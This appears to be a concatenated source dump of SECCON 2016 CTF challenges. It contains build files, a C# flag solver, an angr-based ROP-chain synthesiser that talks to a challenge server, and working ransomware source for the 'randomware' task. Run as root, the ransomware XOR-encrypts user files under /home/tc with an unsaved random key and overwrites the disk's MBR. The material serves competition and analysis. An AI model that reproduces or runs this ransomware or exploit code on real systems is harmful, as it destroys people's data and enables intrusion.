	# confined the directory change to its own shell).
	cd ..
	$(OC) --readonly-text -I binary -O elf32-i386 -B i386 mbrapp/mbr mbr.o
	$(CC) -m32 -o ransom main.c mbr.o
	chmod -x ransom
<file_sep>/Exploit/300_tinypad/build/solver/run.sh
#!/bin/sh
# Build the tinypad challenge image and run it, exposing port 57463.
docker build -t tinypad:latest .
docker run -p 57463:57463 -t tinypad:latest &
<file_sep>/Binary/400_ropsynth/misc/Makefile
# Pattern rules: assemble .nasm sources to 64-bit ELF objects, then link
# them without libc and strip the result.
%.elf : %.o
	gcc -nostdlib -znoexecstack -o $@ $<
	strip $@

%.o : %.nasm
	#nasm -felf64 -w-number-overflow -o $@ $<
	nasm -felf64 -o $@ $<

# NOTE(review): `all` is declared after the pattern rules; since pattern
# rules are not default targets this still works as `make all`.
all: a.elf readflag.elf material.elf gadgets.elf simple_gadgets.elf
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/main.c
#include "colors.h"
#include "util.c"

/* 16-bit real-mode MBR payload: gcc emits .code16gcc code and the first
 * instruction jumps over the helper functions into mbrmain. */
__asm__(".code16gcc");
__asm__("jmp mbrmain");

#define MAX 2016

void mbrmain(void) {
	int i;

	/* Fake "checking files" progress bar shown after the ransomware
	 * has overwritten the MBR and the victim reboots. */
	set_video_mode();
	set_bg_color(TEXT_COLOR_BLACK);
	print("Welcome to SECCON2016!!\r\n", TEXT_COLOR_YELLOW);
	for(i = 0; i < MAX; i++) {
		print("\rChecking ", TEXT_COLOR_WHITE);
		printi(i+1, TEXT_COLOR_WHITE);
		putchar('/', TEXT_COLOR_WHITE);
		printi(MAX, TEXT_COLOR_WHITE);
		print(" files", TEXT_COLOR_WHITE);
	}
	print("\r\nChecking done. Press any key to continue...", TEXT_COLOR_WHITE);
	getkey();
	int cur = 0;
	set_video_mode();
	set_bg_color(TEXT_COLOR_BLACK);
	/* Endless taunt loop cycling through the 16 BIOS text colors;
	 * stop() below is therefore unreachable. */
	while (1) {
		print("\rCan you find the flag? :)", cur%0x10);
		cur++;
	}
	stop();
}
<file_sep>/Crypto/300_biscuiti/workspace/encrypt.php
<?php
// Encrypt the challenge password with AES-128-CBC under a fixed key/IV and
// print it base64-encoded (IV prepended to the raw ciphertext).
define("ENC_KEY", "!Wn<KEY>*>U!");
define("ENC_METHOD", "aes-128-cbc");

$password = "<PASSWORD>";
$iv = "Jo\x91Gwe&J\xf2>G#\xdd.X[";
// 4th argument `true` coerces to 1 (OPENSSL_RAW_DATA): raw binary output.
$enc_password = $iv . openssl_encrypt($password, ENC_METHOD, ENC_KEY, true, $iv);
$enc_password = base64_encode($enc_password);
echo $enc_password . "\n";
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/colors.h
/* BIOS text-mode color attribute values (low nibble of the attribute byte).
 * NOTE(review): the guard macro is defined at the end of the file instead of
 * right after #ifndef; unconventional, but still prevents double inclusion. */
#ifndef _COLORS_H_
#define TEXT_COLOR_BLACK         0x00
#define TEXT_COLOR_BLUE          0x01
#define TEXT_COLOR_GREEN         0x02
#define TEXT_COLOR_CYAN          0x03
#define TEXT_COLOR_RED           0x04
#define TEXT_COLOR_MAGENTA       0x05
#define TEXT_COLOR_BROWN         0x06
#define TEXT_COLOR_LIGHT_GRAY    0x07
#define TEXT_COLOR_DARK_GRAY     0x08
#define TEXT_COLOR_LIGHT_BLUE    0x09
#define TEXT_COLOR_LIGHT_GREEN   0x0a
#define TEXT_COLOR_LIGHT_CYAN    0x0b
#define TEXT_COLOR_LIGHT_RED     0x0c
#define TEXT_COLOR_LIGHT_MAGENTA 0x0d
#define TEXT_COLOR_YELLOW        0x0e
#define TEXT_COLOR_WHITE         0x0f
#define _COLORS_H_
#endif
<file_sep>/Binary/400_ropsynth/misc/use_angrop.py
#!/usr/bin/env python
# Experiment script: load a binary with angr and enumerate ROP gadgets via
# the angrop analysis, then drop into IPython for manual inspection.
import angr, angrop
from IPython import embed
import sys

# Dead code kept for reference: loading a raw blob at a fixed base instead
# of a full ELF.
"""
p = angr.Project("./a.o",
    load_options={
        "main_opts": {
            "custom_arch" : "AMD64",
            "backend" : "blob",
            "custom_base_addr" : 0xdeadbeef,
            "custom_entry_point": 0xdeadbeef,
        },
    })
"""
p = angr.Project(sys.argv[1])
print "ROP"
rop = p.analyses.ROP()
print "find_gadgets"
rop.find_gadgets_single_threaded()
embed()
#rop.do_syscall(1,[])
<file_sep>/Binary/400_ropsynth/misc/solve.py
#!/usr/bin/env python
import angr
import claripy
import sys
from IPython import embed
# Base address at which the raw gadget blob is mapped for analysis.
BASEADDR_CODE = 0x04000000
#fname = sys.argv[1]
fname = "gadgets"

# Load the gadget file as a raw AMD64 blob (no ELF headers) at BASEADDR_CODE.
load_options={
    "main_opts": {
        "custom_arch": "AMD64",
        "backend": "blob",
        "custom_base_addr": BASEADDR_CODE,
        "custom_entry_point": 0,
    },
}
def get_symbuf(size):
    """Return `size` independent 8-bit symbolic claripy variables, one per
    stack byte, named BUF_<offset in hex>."""
    return [claripy.BVS("BUF_%08x" % idx, 8, explicit_name=True)
            for idx in range(size)]
def get_initial_state(prj, symbuf):
    """Create a blank angr state whose stack is filled with the symbolic
    bytes of `symbuf` starting at rsp."""
    #state = prj.factory.entry_state()
    state = prj.factory.blank_state()
    for cnt, symchar in enumerate(symbuf):
        state.memory.store(state.regs.rsp+cnt, symchar, endness='Iend_LE')
    return state
def depends_only_on_buf(symvar):
    """True iff every symbolic variable in `symvar` is a stack-buffer byte
    (name starts with "BUF_")."""
    return all(name.startswith("BUF_") for name in symvar.variables)
def check_constraints(state):
    """True iff every path constraint of `state` depends only on the
    symbolic stack bytes (BUF_*), i.e. is attacker-controllable."""
    return all(depends_only_on_buf(constraint)
               for constraint in state.se.constraints)
# Driver: symbolically execute from every byte offset of the blob and
# collect unconstrained paths (rip fully symbolic) whose constraints depend
# only on the symbolic stack buffer — i.e. usable gadget entry points.
symbuf = get_symbuf(4096)
prj = angr.Project(fname, load_options=load_options)
initial_state = get_initial_state(prj, symbuf)

candidates = []
for offset in range(prj.loader.main_bin.get_min_addr(),
                    prj.loader.main_bin.get_max_addr()):
    state = initial_state.copy()
    pg = prj.factory.path_group(state, save_unconstrained=True)
    pg.step(addr=BASEADDR_CODE+offset)
    while len(pg.active) > 0:
        pg.step()
    for upath in pg.unconstrained:
        if check_constraints(upath.state):
            candidates.append(upath)

embed()
<file_sep>/Forensic/300_randomware/build/ransom/mbrapp/util.c
#include "types.h"
#include "colors.h"
__asm__(".code16gcc");
/* Switch to VGA graphics mode 0x12 via BIOS int 10h, AH=0x00.
 * Intel-syntax inline asm; built with .code16gcc for real mode. */
void set_video_mode(void) {
	__asm__ __volatile__(
		"mov ah, 0x00\n"
		"mov al, 0x12\n"
		"int 0x10\n"
	);
}

/* Set the background/border color via BIOS int 10h, AH=0x0b (BL=color). */
void set_bg_color(uint16_t color) {
	__asm__ __volatile__(
		"mov ah, 0x0b\n"
		"int 0x10\n"
		: : "b"(color)
	);
}
/* Print a NUL-terminated string with BIOS teletype output
 * (int 10h, AH=0x0e; BL carries the foreground color). */
void print(const char *s, uint16_t color) {
	for(;*s;s++) {
		__asm__ __volatile__("int 0x10" : : "a"(0x0E00|*s), "b"(color&0x00ff));
	}
}

/* Print a single character via BIOS teletype output. */
void putchar(const char c, uint16_t color) {
	__asm__ __volatile__("int 0x10" : : "a"(0x0E00|c), "b"(color&0xff));
}

/* Print a positive integer in decimal (recursive digit-by-digit).
 * Note: printi(0) prints nothing, since the base case emits no digit. */
void printi(int n, uint16_t color) {
	if(n) {
		printi(n/10, color);
		putchar((n%10)+'0', color);
	}
}
/* Move the text cursor to column x, row y (int 10h, AH=0x02, page 0). */
void movecursor(uint16_t x, uint16_t y) {
	__asm__ __volatile__("int 0x10" : : "a"(0x0200), "b"(0x0000), "d"(y<<8|x));
}
/* Block until a key is pressed and return the BIOS keystroke value
 * (int 16h, AH=0x00: AH=scan code, AL=ASCII). */
int getkey(void) {
	int ret;
	__asm__ __volatile__("int 0x16" : "=a"(ret) : "a"(0x0000));
	/* Fix: the original fell off the end of a non-void function
	 * (undefined behavior; it only worked because AX happened to
	 * hold the value). */
	return ret;
}
/* Wait for a keypress (int 16h) then invoke the BIOS bootstrap loader
 * (int 19h), effectively rebooting into the boot sector. */
void reboot(void) {
	__asm__ __volatile__(
		"mov ah, 0x00\n"
		"int 0x16\n"
		"int 0x19\n"
	);
}

/* Halt forever (hlt in an infinite loop so interrupts cannot resume us). */
void stop(void) {
	while(1) {
		__asm__ ("hlt");
	}
}
<file_sep>/Binary/200_Retrospective/Solver/Solver/Solver/Program.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
namespace Solver
{
class Program
{
    // Known prefix of the flag, extended by the first prediction pass.
    static limited_char[] cache;

    /// <summary>
    /// Randomized hill-climbing search for a 27-character string whose
    /// weighted checksum sum(str[i] * 2^i) equals the target signature.
    /// Characters are constrained to A-Z/underscore by limited_char's
    /// ++/-- operators; positions already fixed in `cache` are kept.
    /// </summary>
    static string solve()
    {
    RESCAN:
        var signature = 0x620F3671;
        var str = new limited_char[28];
        var sum = (long)long.MaxValue;
        var maskswitch = false;
        var rnd = new Random();
        for (int i = 0; i < str.Length; i++)
            str[i] = 0;
        // Random initial guess for the free positions (printable ASCII).
        for (int i = 0; i < str.Length - 1; i++)
        {
            str[i] = new limited_char((char)rnd.Next((int)' ', (int)'~'));
        }
        // Pin the already-known prefix.
        for (int i = 0; i < cache.Length; i++)
            str[i] = cache[i];
        // Until the prefix reaches position 16, hard-code the known
        // "_P_" fragment at positions 16-18 and skip them when mutating.
        if (cache.Length < 16)
        {
            maskswitch = true;
            str[16] = '_';
            str[17] = 'P';
            str[18] = '_';
        }
        do
        {
            // Pick a mutable position and nudge it up or down depending on
            // whether the current checksum is below or above the target.
            var act = rnd.Next(cache.Length, str.Length - 1 - (maskswitch ? 3 : 0));
            if (act >= 16) act += (maskswitch ? 3 : 0);
            var bck = str[act];
            var bck2 = sum;
            if (sum < signature)
            {
                // Only grow characters inside the current string length.
                if (act <= str.Select((e, i) => new { Index = i, Element = e }).First(e => e.Element == 0x0).Index)
                    str[act]++;
            }
            else if (sum > signature)
            {
                str[act]--;
                // Don't punch a hole in the middle of the string.
                if (str[act + 1] != 0 && str[act] == 0x0)
                {
                    str[act]++;
                }
            }
            {
                // Evaluate the checksum with a temporary closing '}'.
                var n = str.Select((e, i) => new { Index = i, Element = e }).First(e => e.Element == 0x0).Index;
                str[n] = '}';
                sum = str.Select((e, i) => e * (long)Math.Pow(2, i)).Sum();
                str[n] = 0;
            }
            // Reject mutations that move clearly away from the target.
            if ((Math.Abs(bck2 - signature) + 0x1000) <= Math.Abs(sum - signature))
            {
                str[act] = bck;
                continue;
            }
        }
        while (sum != signature);
        // Secondary constraint: positions 14-15 satisfy a base-4 weighted
        // sum of 350 and the "_P_" fragment is in place; otherwise restart.
        if (str.Skip(14).Take(2).Select((e, i) => (long)e * (long)Math.Pow(4, i)).Sum() == 350 && str[16] == '_' && str[17] == 'P' && str[18] == '_')
        { }
        else
        {
            goto RESCAN;
        }
        var ret = new string(str.TakeWhile(e => e != 0).Select(e => (char)e).ToArray()).Trim() + "}";
        sum = ret.Select((j, i) => j * (long)Math.Pow(2, i)).Sum();
        return ret;
    }

    static void Main(string[] args)
    {
        cache = "SECCON{LEGACY_".ToCharArray().Select(e => (limited_char)e).ToArray();
        var time = DateTime.Now;
        Console.WriteLine("BEGIN : " + time);
        {
            // Pass 1: run 20 parallel searches, vote on the most common
            // 19-character prefix, and lock it in as the new cache.
            Console.Write("1st prediction...");
            var ret = new List<string>();
            Parallel.For(0, 20, i =>
            {
                ret.Add(solve());
            });
            ret.Sort();
            Console.WriteLine("Done : " + (DateTime.Now - time));
            var z = ret.Select(e => e.Substring(0, 19)).GroupBy(e => e).ToDictionary(e => e.Key, e => e.Count()).OrderByDescending(e => e.Value);
            foreach(var e in z)
            {
                Console.WriteLine(e.Key + " --- " + e.Value);
            }
            Console.WriteLine("Choose : " + z.First().Key);
            cache = z.First().Key.Select(e => (limited_char)e).ToArray();
        }
        {
            // Pass 2: keep solving until the SHA-1 of the candidate matches
            // the known flag digest.
            string ret = "";
            Console.WriteLine();
            Console.Write("2nd prediction...");
            while (true)
            {
                ret = solve();
                var hash = BitConverter.ToString(SHA1Managed.Create().ComputeHash(Encoding.ASCII.GetBytes(ret))).Replace("-", "");
                if (hash == "8B292F1A9C4631B3E13CD49C64EF74540352D0C0")
                    break;
            }
            Console.WriteLine("SOLVED : " + (DateTime.Now - time));
            Console.WriteLine();
            Console.WriteLine("RET : " + ret);
        }
        Console.WriteLine();
    }
}
}
<file_sep>/Forensic/300_randomware/build/ransom/main.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/reboot.h>
/* Length of the repeating XOR keystream. */
#define KEY_SIZE 1024

/* Symbols created by objcopy from the embedded MBR image (mbrapp/mbr). */
extern char _binary_mbrapp_mbr_start[];
extern char _binary_mbrapp_mbr_end[];
extern char _binary_mbrapp_mbr_size[];

dev_t root_dev;                 /* device id of the filesystem holding /home */
const char *mbr_start, *mbr_end;
char encrypt_key[KEY_SIZE];     /* random XOR key read from /dev/urandom */
int mbr_size;

/* File extensions targeted for encryption (matched as suffixes). */
static char target_ext[][10] = {
	".txt", ".bin",
	// picture
	".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tif", ".tiff",
	// documents
	".doc", ".docx", ".docm",
	".xls", ".xlsx", ".xlsm",
	".ppt", ".pptx", ".pptm",
	".odt", ".pdf", ".xml",
};
/* XOR-encrypt the file at `path` in place with the repeating
 * KEY_SIZE-byte key in encrypt_key.  Errors are reported and skipped. */
void encrypt(char *path) {
	FILE *fp;
	int i;
	char *buf;
	int size;

	if((fp = fopen(path, "r+")) == NULL) {
		perror("fopen");
		return;
	}
	fseek(fp, 0, SEEK_END);
	size = ftell(fp);
	if(size <= 0) {           /* empty file, or ftell failed (-1) */
		fclose(fp);
		return;
	}
	buf = (char*)malloc(size*sizeof(char));
	if(buf == NULL) {         /* fix: original dereferenced NULL on OOM */
		perror("malloc");
		fclose(fp);
		return;
	}
	fseek(fp, 0, SEEK_SET);
	if(fread(buf, 1, size, fp) != (size_t)size) {
		/* fix: original ignored short reads and encrypted garbage */
		perror("fread");
		free(buf);
		fclose(fp);
		return;
	}
	for(i = 0; i < size; i++) {
		buf[i] = buf[i]^encrypt_key[i%KEY_SIZE];
	}
	fseek(fp, 0, SEEK_SET);
	fwrite(buf, 1, size, fp);
	free(buf);
	fclose(fp);
}
/* Record the device id of the filesystem containing /home into root_dev,
 * so the traversal can skip files on other (virtual) filesystems. */
void get_root_dev(void) {
	struct stat st;

	if(stat("/home", &st)) {
		perror("stat");
		return;
	}
	root_dev = st.st_dev;
}
/* Fill encrypt_key with KEY_SIZE random bytes from /dev/urandom. */
void get_key() {
	FILE *fp;

	if((fp = fopen("/dev/urandom", "r")) == NULL) {
		perror("fopen");
		/* Fix: the original fell through and called fread/fclose on
		 * a NULL stream when the open failed. */
		return;
	}
	if(fread(encrypt_key, 1, KEY_SIZE, fp) < KEY_SIZE) {
		perror("fread");
	}
	fclose(fp);
}
/* Recursively walk `path`, encrypting every regular file whose name ends
 * with one of the extensions in target_ext.  Files on a different device
 * than root_dev (virtual filesystems) are skipped. */
void recdir(char *path) {
	DIR *dp;
	struct dirent *dent;
	struct stat st;
	char *tmp;
	int len1, len2, addslash;
	int i;

	if((dp = opendir(path)) == NULL) {
		perror("opendir");
		return;
	}
	while((dent = readdir(dp)) != NULL) {
		if(!strcmp(dent->d_name, ".")) {
			continue;
		}
		if(!strcmp(dent->d_name, "..")) {
			continue;
		}
		/* Build "path/name" (adding a slash only when needed). */
		len1 = strlen(path);
		len2 = strlen(dent->d_name);
		addslash = (path[len1-1] != '/')?1:0;
		tmp = (char*)malloc(len1+len2+2);
		strcpy(tmp, path);
		if(addslash) strcat(tmp, "/");
		strcpy(tmp+len1+addslash, dent->d_name);
		if(stat(tmp, &st)) {
			perror("stat");
			free(tmp);
			continue;
		}
		/* NOTE(review): `st.st_mode & S_IFMT == S_IFBLK` parses as
		 * `st.st_mode & (S_IFMT == S_IFBLK)` because == binds tighter
		 * than &.  Each comparison is 0, so only the device check is
		 * effective here — which is in fact what lets regular files
		 * fall through to the encryption branch below.  "Fixing" the
		 * parentheses would change runtime behavior; confirm intent
		 * before touching this. */
		if(st.st_dev != root_dev // file on virtual file system
		   || st.st_mode & S_IFMT == S_IFBLK
		   || st.st_mode & S_IFMT == S_IFCHR
		   || st.st_mode & S_IFMT == S_IFIFO
		   || st.st_mode & S_IFMT == S_IFLNK
		   || st.st_mode & S_IFMT == S_IFREG
		   || st.st_mode & S_IFMT == S_IFSOCK ) { // ignore files
			continue;
		}
		if ((st.st_mode & S_IFMT) == S_IFDIR) { // directory
			recdir(tmp);
		}
		else { // file
			/* NOTE(review): if the extension does not occur in tmp,
			 * strstr returns NULL and `NULL - tmp` is undefined
			 * pointer arithmetic (in practice the comparison just
			 * fails).  A strlen-based suffix check would be safer. */
			for(i = 0; i < sizeof(target_ext)/sizeof(char*); i++) {
				if(strstr(tmp, target_ext[i])-tmp == strlen(tmp)-strlen(target_ext[i])) {
					encrypt(tmp);
				}
			}
		}
		free(tmp);
	}
	closedir(dp);
}
/* Entry point: as root, fetch the "flag" decoy, encrypt the user's files
 * under /home/tc with a random XOR key, then overwrite the MBR of /dev/sda
 * with the embedded 16-bit payload. */
int main(int argc, char **argv) {
	FILE *fp;

	if(getuid() != 0) {
		fprintf(stderr, "Please run as root.\n");
		exit(-1);
	}
	// remove(argv[0]);
	system("wget http://172.17.0.1/h1dd3n_s3cr3t_f14g.jpg");
	get_root_dev();
	get_key();
	recdir("/home/tc");
	mbr_start = _binary_mbrapp_mbr_start;
	mbr_end = _binary_mbrapp_mbr_end;
	/* objcopy encodes the size as the *address* of this symbol. */
	mbr_size = (int)_binary_mbrapp_mbr_size;

	// overwrite mbr
	// sprintf(tmp, "/sys/dev/block/%d:%d", major(root_dev), minor(root_dev));
	if((fp = fopen("/dev/sda", "r+"))== NULL) {
		perror("fopen");
		/* Fix: original used a bare `return;`, invalid in a function
		 * returning int. */
		return 1;
	}
	fwrite(mbr_start, 1, mbr_size, fp);
	fclose(fp);
	// system("reboot");
	// reboot(LINUX_REBOOT_CMD_RESTART);
	return 0;
}
<file_sep>/Binary/400_ropsynth/solver/solve.py
#!/usr/bin/env python
import angr
import claripy
import sys
from IPython import embed
from simuvex import s_options
import logging
import pwn
import binascii
# Solver logger; silence simuvex's very chatty output.
l = logging.getLogger("ropsynth")
l.setLevel(logging.INFO)
logging.getLogger("simuvex").setLevel(logging.CRITICAL)

# Fixed map addresses used by the challenge: gadget blob and scratch data.
BASEADDR_CODE = 0x00800000
BASEADDR_DATA = 0x00a00000
def get_symbuf(size):
    """Build `size` independent one-byte symbolic variables (BUF_<hex offset>)
    representing attacker-controlled stack bytes."""
    return [claripy.BVS("BUF_%08x" % idx, 8, explicit_name=True)
            for idx in range(size)]
def get_initial_state(prj, symbuf):
    """Blank state with the symbolic buffer on the stack and the string
    "flag\\0" planted at BASEADDR_DATA (path for the open syscall)."""
    #state = prj.factory.entry_state()
    state = prj.factory.blank_state()
    for cnt, symchar in enumerate(symbuf):
        state.memory.store(state.regs.rsp+cnt, symchar, endness='Iend_LE')
    state.memory.store(BASEADDR_DATA, claripy.BVV("flag\0"))
    # Dead code kept for reference: zeroing all GP registers was tried and
    # disabled.
    """
    state.regs.rax = claripy.BVV(0, 64)
    state.regs.rbp = claripy.BVV(0, 64)
    state.regs.rbx = claripy.BVV(0, 64)
    state.regs.rcx = claripy.BVV(0, 64)
    state.regs.rdi = claripy.BVV(0, 64)
    state.regs.rdx = claripy.BVV(0, 64)
    state.regs.rax = claripy.BVV(0, 64)
    state.regs.rsi = claripy.BVV(0, 64)
    state.regs.r8 = claripy.BVV(0, 64)
    state.regs.r9 = claripy.BVV(0, 64)
    state.regs.r10 = claripy.BVV(0, 64)
    state.regs.r11 = claripy.BVV(0, 64)
    state.regs.r12 = claripy.BVV(0, 64)
    state.regs.r13 = claripy.BVV(0, 64)
    state.regs.r14 = claripy.BVV(0, 64)
    state.regs.r15 = claripy.BVV(0, 64)
    """
    return state
def depends_only_on_buf(symvar, offset_limit):
    """True iff every symbolic variable in `symvar` is a stack-buffer byte
    ("BUF_*").

    `offset_limit` is currently unused: the range check against it was
    disabled in the original (left as a dead string literal).
    """
    return all(name.startswith("BUF_") for name in symvar.variables)
def check_constraints(state):
    """True iff every path constraint depends only on the symbolic stack
    bytes already consumed (offset relative to the saved orig_rsp)."""
    global orig_rsp
    limit = state.se.any_int(state.regs.rsp - orig_rsp)
    return all(depends_only_on_buf(constraint, limit)
               for constraint in state.se.constraints)
def check_memory_access(path):
    """Reject paths whose memory accesses are symbolic or fall outside the
    4096-byte ROP-chain window on the stack."""
    global orig_rsp
    for action in path.actions:
        if action.type == 'mem':
            if action.addr.ast.symbolic:
                # Disabled: allowing symbolic addresses that only depend
                # on the controlled buffer.
                """
                if depends_only_on_buf(action.addr.ast, None):
                    continue
                """
                return False
            else:
                # TODO: check address
                addr = path.state.se.any_int(action.addr)
                if addr < orig_rsp or addr >= orig_rsp+4096:
                    l.info("addr:%x orig_rsp: %x" % (addr, orig_rsp))
                    return False
    return True
# Raw x86-64 opcode patterns searched for inside the gadget blob.
set_rax2rdi = "\x50\x5f"   # push rax ; pop rdi
pop_rdi = "\x5f"           # pop rdi
pop_rax = "\x58"           # pop rax
syscall = "\x0f\x05"       # syscall
pop_rbx = "\x5b"           # pop rbx
pop_rsi = "\x5e"           # pop rsi
set_rax2rdx = "\x50\x5a"   # push rax ; pop rdx
pop_rdx = "\x5a"           # pop rdx
def findall(prj, target):
    """Return every (possibly overlapping) offset of byte pattern `target`
    within the first 4096 bytes of the loaded blob."""
    image = "".join(prj.loader.main_bin.memory.read_bytes(0, 4096))
    hits = []
    start = 0
    while True:
        pos = image.find(target, start)
        if pos < 0:
            break
        hits.append(pos)
        start = pos + 1
    return hits
debug = 0

def find_gadget(prj, initial_state, insn_ptn, get_constraints,
                first_gadget=False, last_gadget=False):
    """Symbolically execute from every occurrence of `insn_ptn` in the blob
    and return the successor state of the first gadget whose constraints are
    fully controlled by the stack buffer and satisfy `get_constraints`.

    first_gadget: the gadget address is popped from the top of the stack.
    last_gadget:  also accept deadended paths (e.g. exit via syscall).
    Returns None when no usable gadget is found.
    """
    final_states = []
    candidates = []
    for offset in findall(prj, insn_ptn):
        #l.info("pattern found: %x" % offset)
        state = initial_state.copy()
        if first_gadget:
            # Constrain the first qword on the stack to the gadget address.
            state.add_constraints(
                state.memory.load(state.regs.rsp, endness='Iend_LE') == (BASEADDR_CODE+offset))
            state.regs.rsp += 8
        else:
            #print "rip:", state.regs.rip,
            #print "value:", BASEADDR_CODE+offset
            state.add_constraints(state.regs.rip == (BASEADDR_CODE+offset))
        pg = prj.factory.path_group(state, save_unconstrained=True)
        if insn_ptn == syscall:
            # dirty hack for syscall
            pg.step(addr=BASEADDR_CODE+offset+2)
        else:
            pg.step(addr=BASEADDR_CODE+offset)
        loopcnt=0
        while len(pg.active) > 0:
            pg.step()
            loopcnt += 1
            if loopcnt > 100:
                #raise Exception("loop limit")
                l.warn("loop limit")
                break
        if len(pg.unconstrained) == 0 and last_gadget == False:
            continue
        # Unconstrained rip = the gadget returned into attacker control.
        for upath in pg.unconstrained:
            if check_constraints(upath.state):
                candidates.append((upath, offset))
        if last_gadget:
            for dpath in pg.deadended:
                if check_constraints(dpath.state):
                    candidates.append((dpath, offset))
    for cand_path, cand_offset in candidates:
        # Sanity-limit the stack consumed by the gadget.
        rsp_delta = cand_path.state.se.any_int(cand_path.state.regs.rsp - initial_state.regs.rsp)
        if rsp_delta < 8 or rsp_delta > 256:
            l.info("rsp_delta limit")
            continue
        else:
            l.info("rsp_delta: %d" % rsp_delta)
        constraints = get_constraints(cand_path.state)
        if constraints != None:
            cand_path.state.add_constraints(constraints)
        if cand_path.state.satisfiable():
            if check_memory_access(cand_path):
                l.info("candidate offset: %x" % cand_offset)
                final_states.append(cand_path.state)
    l.info("len(final_states): %d" % len(final_states))
    if len(final_states) == 0:
        return None
    if len(final_states) > 1:
        l.info("multiple candidates exist")
    return final_states[0]
    #return final_states[-1]
# Initial rsp of the analysis state; used globally by the constraint checks.
orig_rsp = 0

def construct_ropchain(fname):
    """Build a concrete ROP chain from the gadget blob in `fname` that
    performs open("flag") / read / write(stdout) / exit(0), and return the
    raw bytes to place on the stack."""
    global orig_rsp
    load_options={
        "main_opts": {
            "custom_arch": "AMD64",
            "backend": "blob",
            "custom_base_addr": BASEADDR_CODE,
            "custom_entry_point": 0,
        },
    }
    l.info("started")
    prj = angr.Project(
        fname, load_options=load_options, simos=angr.simos.SimLinux)
    # angr's bug? A blob project needs is_ppc64_abiv1.
    prj.loader.main_bin.is_ppc64_abiv1 = False
    symbuf = get_symbuf(4096)
    initial_state = get_initial_state(prj, symbuf)
    initial_state.options.add(s_options.BYPASS_UNSUPPORTED_SYSCALL)
    initial_state.options.add(s_options.NO_SYMBOLIC_SYSCALL_RESOLUTION)
    initial_state.options.add(s_options.AVOID_MULTIVALUED_READS)
    initial_state.options.add(s_options.AVOID_MULTIVALUED_WRITES)
    initial_state.options.add(s_options.TRACK_ACTION_HISTORY)
    state = initial_state
    orig_rsp = state.se.any_int(initial_state.regs.rsp)
    # open(BASEADDR_DATA="flag", O_RDONLY, 0)  -> rax = fd
    state = find_gadget(
        prj, state, pop_rdi, lambda s: s.regs.rdi == BASEADDR_DATA, True)
    state = find_gadget(prj, state, pop_rsi, lambda s: s.regs.rsi == 0)
    state = find_gadget(prj, state, pop_rdx, lambda s: s.regs.rdx == 0)
    state = find_gadget(prj, state, pop_rax, lambda s: s.regs.rax == 2)
    state = find_gadget(prj, state, syscall, lambda s: None)
    # read(fd, BASEADDR_DATA, 255)  -> rax = nbytes
    state = find_gadget(
        prj, state, set_rax2rdi, lambda s: state.regs.rax == s.regs.rdi)
    state = find_gadget(
        prj, state, pop_rsi, lambda s: s.regs.rsi == BASEADDR_DATA)
    state = find_gadget(prj, state, pop_rdx, lambda s: s.regs.rdx == 255)
    state = find_gadget(prj, state, pop_rax, lambda s: s.regs.rax == 0)
    state = find_gadget(prj, state, syscall, lambda s: None)
    # write(1, BASEADDR_DATA, nbytes)
    state = find_gadget(prj, state, pop_rdi, lambda s: s.regs.rdi == 1)
    state = find_gadget(
        prj, state, pop_rsi, lambda s: s.regs.rsi == BASEADDR_DATA)
    state = find_gadget(
        prj, state, set_rax2rdx, lambda s: state.regs.rax == s.regs.rdx)
    state = find_gadget(prj, state, pop_rax, lambda s: s.regs.rax == 1)
    state = find_gadget(prj, state, syscall, lambda s: None)
    # exit_group(0)
    state = find_gadget(prj, state, pop_rdi, lambda s: s.regs.rdi == 0)
    state = find_gadget(prj, state, pop_rax, lambda s: s.regs.rax == 231)
    state = find_gadget(prj, state, syscall, lambda s: None, last_gadget=True)
    # Concretize exactly the stack bytes consumed by the chain.
    buf = ""
    for cnt in range(state.se.any_int(state.regs.rsp-orig_rsp)):
        buf += state.se.any_str(symbuf[cnt])
    l.info("finished")
    return buf
def main():
    # Connect to the challenge server; host and port come from the command line.
    # NOTE: Python 2 code (print statements, byte strings) using a project-local
    # `pwn` helper module -- not the public pwntools API.
    sock = pwn.mktcp((sys.argv[1], int(sys.argv[2])))
    cnt = 0
    # Each round: receive a base64 gadget blob, build a ROP chain for it with
    # construct_ropchain(), send the chain back, and repeat until the flag appears.
    while True:
        gadgets_fname = "gadgets.%d" % cnt
        ropchain_fname = "ropchain.%d" % cnt
        banner = sock.recv_until("\n").strip()
        # The server prints the flag (SECCON{...}) once every round is solved.
        if banner.startswith("SECCON{"):
            break
        print banner
        encoded_gadgets = sock.recv_until("\n")
        gadgets = binascii.a2b_base64(encoded_gadgets)
        # Pad the gadget region to exactly 4096 bytes with int3 (0xCC) filler,
        # then persist it so construct_ropchain() can load it as a blob binary.
        gadgets += '\xCC' * (4096-len(gadgets))
        open(gadgets_fname, "wb").write(gadgets)
        ropchain = construct_ropchain(gadgets_fname)
        # Pad the chain to 4096 bytes with 0xFF filler before sending.
        ropchain += '\xFF' * (4096-len(ropchain))
        open(ropchain_fname, "wb").write(ropchain)
        sock.send(binascii.b2a_base64(ropchain))
        result = sock.recv_until("\n").strip()
        # Anything other than "OK" means the chain failed on the server side;
        # show the message and stop.
        if result != "OK":
            print result
            break
        print result
        cnt += 1
    # The last banner received is either the flag or the failure text.
    print banner


if __name__ == '__main__':
    main()
<file_sep>/Binary/200_Retrospective/Solver/Solver/Solver/limited_char.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Solver
{
    /// <summary>
    /// A character constrained to the uppercase range 'A'(0x41)-'Z'(0x5A),
    /// plus '_' (0x5F) and NUL, with clamping increment/decrement and
    /// implicit conversions to and from char/int.
    /// </summary>
    class limited_char
    {
        private char _current;

        public limited_char(char i)
        {
            _current = i;
        }

        // A null reference converts to NUL; otherwise yield the wrapped char.
        public static implicit operator char(limited_char c)
        {
            return ReferenceEquals(c, null) ? (char)0 : c._current;
        }

        // A null reference converts to 0; otherwise the char's code point.
        public static implicit operator int(limited_char c)
        {
            return ReferenceEquals(c, null) ? 0 : c._current;
        }

        public static implicit operator limited_char(char c)
        {
            return new limited_char(c);
        }

        public static implicit operator limited_char(int c)
        {
            return new limited_char((char)c);
        }

        public override string ToString()
        {
            return _current.ToString();
        }

